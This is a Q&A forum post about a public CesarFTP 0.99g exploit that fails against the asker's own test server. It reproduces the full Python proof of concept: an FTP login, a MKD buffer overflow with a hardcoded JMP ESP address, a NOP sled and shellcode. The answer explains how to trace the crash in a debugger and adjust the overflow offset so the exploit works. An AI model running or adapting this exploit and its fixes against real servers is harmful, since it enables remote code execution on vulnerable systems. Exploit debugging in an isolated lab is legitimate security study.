# Why is cesarftp python exploits not working?

Tags: debugging, ftp, exploit, ollydbg

I tested on my server that has cesarftp running. I debugged the ftp server on the server using ollydbg.

The exploit I used is http://www.exploit-db.com/exploits/1906/

```
#!/usr/bin/python

#CesarFtp 0.99g 0day Exploit

#Proof of Concept: execute calc.exe

#Tested on XP sp2 polish

#Bug found by h07 [h07@interia.pl]

#Date: 10.06.2006



from socket import *



shellcode = ( #execute calc.exe <metasploit.com>

"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"

"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"

"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"

"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"

"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"

"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"

"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"

"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"

"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"

"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"

"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")



def intel_order(i):

    a = chr(i % 256)

    i = i >> 8

    b = chr(i % 256)

    i = i >> 8

    c = chr(i % 256)

    i = i >> 8

    d = chr(i % 256)

    str = "%c%c%c%c" % (a, b, c, d)

    return str



host = "192.168.0.1"

port = 21

user = "ftp"

password = "ftp"

EIP = 0x773D10A4 #jmp esp <shell32.dll XP professional sp2 english>



s = socket(AF_INET, SOCK_STREAM)

s.connect((host, port))

print s.recv(1024)



s.send("user %s\r\n" % (user))

print s.recv(1024)



s.send("pass %s\r\n" % (password))

print s.recv(1024)



buffer = "MKD "

buffer += "\n" * 671

buffer += "A" * 3 + intel_order(EIP)

buffer += "\x90" * 40 + shellcode

buffer += "\r\n"



print "len: %d" % (len(buffer))



s.send(buffer)

print s.recv(1024)



s.close()



#EoF 



# milw0rm.com [2006-06-12]
```

I changed the "JMP ESP" address to the correct one (as the server is not running Polish XP; it's running English XP. I found this using executable modules on ollydbg and searching for command "JMP ESP".)

However, the exploit failed to execute properly, and after logging in, the ftp server just crashed, not bringing up shell.

It seems to me that the code only needs modification on "JMP ESP" area..

What did I do wrong?

Edit: the shellcode seems to, if properly executed, bring up calc.exe. This didn't happen. And obviously, there was no shell obtained.

Comment: Obvious question: are you running 0.99g?

Comment: yes I do. I checked more than three times :)

Answer (score 0):

It's possible the vulnerable function is not copying your data with strcpy() but with strcat(). This is a common rookie mistake when writing exploits by trial and error.

Since the value being read is supposed to be a path, it's possible that what's really happening here is that your string is being concatenated to the path of the root of the FTP server.

If that happens, then you not only have to change the just address but the offset to it in the payload string (the "671" value). Unfortunately this would also mean the exploit will depend on knowing the exact location of the FTP root.

To make sure you'll have to attach a debugger and see what's going on before and after the payload is sent. Try the following:

1. Attach the debugger to the FTP server.
2. Run the exploit. It will crash the server.
3. Now EIP will point to 0x90909090 or 0x0d0d0d0d. Examine the stack until you find a valid pointer to code (the return address of a parent function).
4. Now kill the server and start it over.
5. Attach the debugger again, and set a breakpoint at the beginning of that parent function you found.
6. Run the exploit again. Now the breakpoint should hit. Run the code step by step until you find the vulnerable function. Now you'll be able to see which function has the bug and what the stack looks like before you smash it.